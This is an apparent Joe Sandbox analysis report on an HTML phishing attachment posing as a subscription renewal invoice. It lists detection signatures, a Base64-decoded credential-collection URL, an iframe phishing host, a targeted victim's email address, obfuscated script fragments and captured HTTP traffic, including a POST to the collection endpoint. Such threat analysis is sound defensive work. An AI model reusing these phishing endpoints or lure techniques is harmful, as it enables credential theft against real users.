Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Subscription_Renewal_Invoice_2025_HKVXTC.html

Overview

General Information

Sample name:Subscription_Renewal_Invoice_2025_HKVXTC.html
Analysis ID:1585811
MD5:4ffb03ac69f765758d17f59e4fe160d4
SHA1:4f7c299debde0b4791e68f91f98e951a69b12885
SHA256:40ee96d6bd67d5cef702bed84b17e5a1ae72afc9bdfeddb81315130dcc642a4c
Infos:

Detection

HTMLPhisher
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Yara detected HtmlPhish45
AI detected suspicious Javascript
HTML IFrame injector detected
HTML Script injector detected
HTML document with suspicious name
HTML file submission containing password form
HTML page contains obfuscated javascript
HTML body contains password input but no form action
HTML page contains hidden javascript code
IP address seen in connection with other malware
Invalid 'forgot password' link found
Invalid 'sign-in options' or 'sign-up' link found
None HTTPS page querying sensitive user data (password, username or email)

Classification

  • System is w10x64
  • chrome.exe (PID: 2144 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Subscription_Renewal_Invoice_2025_HKVXTC.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3636 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2028,i,12400976106869586370,12546143425724789010,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.2.pages.csvJoeSecurity_HtmlPhish_45Yara detected HtmlPhish_45Joe Security
    1.4.pages.csvJoeSecurity_HtmlPhish_45Yara detected HtmlPhish_45Joe Security
      1.3.pages.csvJoeSecurity_HtmlPhish_45Yara detected HtmlPhish_45Joe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://bummings.chiliesdigital.co.za/app/godag.phpAvira URL Cloud: Label: malware

        Phishing

        barindex
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 1.3.pages.csv
        Source: Yara matchFile source: 1.2.pages.csv, type: HTML
        Source: Yara matchFile source: 1.4.pages.csv, type: HTML
        Source: Yara matchFile source: 1.3.pages.csv, type: HTML
        Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/Subscription_Renewa... This script exhibits several high-risk behaviors, including the use of dynamically generated URLs and the loading of an iframe from a potentially suspicious domain. The script also performs aggressive DOM manipulation by toggling the visibility of elements. While the script may have a legitimate purpose, the combination of these behaviors raises concerns and warrants further investigation.
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: New IFrame, src: https://vNOndb0NbW.satelitnetkomputer.my.id:8443/impact?9Il8ioxWZyn0?key=matthieu.biens@rockwool.com
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: New script tag found
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: New script tag found
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: New script tag found
        Source: https://vnondb0nbw.satelitnetkomputer.my.id:8443/impact?9Il8ioxWZyn0?key=matthieu.biens@rockwool.comHTTP Parser: function _0x3684(_0x22b152,_0x1bdcfa){var _0x41d1c6=_0x13ca();return _0x3684=function(_0x4bab88,_0x
        Source: https://vnondb0nbw.satelitnetkomputer.my.id:8443/impact#matthieu.biens@rockwool.comHTTP Parser: function _0x3684(_0x22b152,_0x1bdcfa){var _0x41d1c6=_0x13ca();return _0x3684=function(_0x4bab88,_0x
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: Base64 decoded: https://Bummings.chiliesdigital.co.za/app/godag.php
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: Invalid link: Forgot my password
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: Invalid link: Create one!
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: Has password / email / username input fields
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: <input type="password" .../> found
        Source: Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: No favicon
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: No <meta name="author".. found
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: No <meta name="author".. found
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: No <meta name="author".. found
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: No <meta name="copyright".. found
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: No <meta name="copyright".. found
        Source: file:///C:/Users/user/Desktop/Subscription_Renewal_Invoice_2025_HKVXTC.htmlHTTP Parser: No <meta name="copyright".. found
        Source: Joe Sandbox ViewIP Address: 104.18.10.207 104.18.10.207
        Source: Joe Sandbox ViewIP Address: 104.18.10.207 104.18.10.207
        Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
        Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vnondb0nbw.satelitnetkomputer.my.id:8443sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vnondb0nbw.satelitnetkomputer.my.id:8443sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vnondb0nbw.satelitnetkomputer.my.id:8443sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vnondb0nbw.satelitnetkomputer.my.id:8443sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/converged.v2.login.min_kfhrfyfy-sm2tmkm5ficcw2.css HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /jquery-3.3.1.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /app/godag.php HTTP/1.1Host: bummings.chiliesdigital.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /app/godag.php HTTP/1.1Host: bummings.chiliesdigital.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=majrhsnjttj7ab63ae4brvfa50
        Source: global trafficHTTP traffic detected: GET /app/godag.php HTTP/1.1Host: bummings.chiliesdigital.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=majrhsnjttj7ab63ae4brvfa50
        Source: global trafficHTTP traffic detected: GET /app/godag.php HTTP/1.1Host: bummings.chiliesdigital.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=majrhsnjttj7ab63ae4brvfa50
        Source: global trafficHTTP traffic detected: GET /app/godag.php HTTP/1.1Host: bummings.chiliesdigital.co.zaConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=majrhsnjttj7ab63ae4brvfa50
        Source: global trafficHTTP traffic detected: GET /mail/ HTTP/1.1Host: outlook.office.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficDNS traffic detected: DNS query: vnondb0nbw.satelitnetkomputer.my.id
        Source: global trafficDNS traffic detected: DNS query: _8443._https.vnondb0nbw.satelitnetkomputer.my.id
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
        Source: global trafficDNS traffic detected: DNS query: code.jquery.com
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
        Source: global trafficDNS traffic detected: DNS query: bummings.chiliesdigital.co.za
        Source: global trafficDNS traffic detected: DNS query: office.com
        Source: global trafficDNS traffic detected: DNS query: www.office.com
        Source: global trafficDNS traffic detected: DNS query: officehub.nel.measure.office.net
        Source: global trafficDNS traffic detected: DNS query: outlook.office.com
        Source: unknownHTTP traffic detected: POST /app/godag.php HTTP/1.1Host: bummings.chiliesdigital.co.zaConnection: keep-aliveContent-Length: 70sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://vnondb0nbw.satelitnetkomputer.my.id:8443Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: http://jquery.org/license
        Source: chromecache_98.2.dr, chromecache_103.2.drString found in binary or memory: http://opensource.org/licenses/MIT).
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=378607
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=449857
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=470258
        Source: chromecache_102.2.drString found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=589347
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://bugs.jquery.com/ticket/12359
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://bugs.jquery.com/ticket/13378
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=136851
        Source: chromecache_102.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=137337
        Source: chromecache_102.2.drString found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://drafts.csswg.org/cssom/#common-serializing-idioms
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://drafts.csswg.org/cssom/#resolved-values
        Source: chromecache_94.2.dr, chromecache_106.2.drString found in binary or memory: https://getbootstrap.com)
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://github.com/eslint/eslint/issues/3229
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://github.com/eslint/eslint/issues/6125
        Source: chromecache_102.2.drString found in binary or memory: https://github.com/jquery/jquery/pull/557)
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://github.com/jquery/sizzle/pull/225
        Source: chromecache_102.2.drString found in binary or memory: https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon
        Source: chromecache_94.2.dr, chromecache_106.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
        Source: chromecache_94.2.dr, chromecache_106.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://html.spec.whatwg.org/#strip-and-collapse-whitespace
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#category-listed
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#attributes-2
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://jquery.com/
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://jquery.org/license
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://jsperf.com/getall-vs-sizzle/2
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://jsperf.com/thor-indexof-vs-for/5
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://promisesaplus.com/#point-48
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://promisesaplus.com/#point-54
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://promisesaplus.com/#point-57
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://promisesaplus.com/#point-59
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://promisesaplus.com/#point-61
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://promisesaplus.com/#point-64
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://promisesaplus.com/#point-75
        Source: chromecache_95.2.dr, chromecache_102.2.drString found in binary or memory: https://sizzlejs.com/
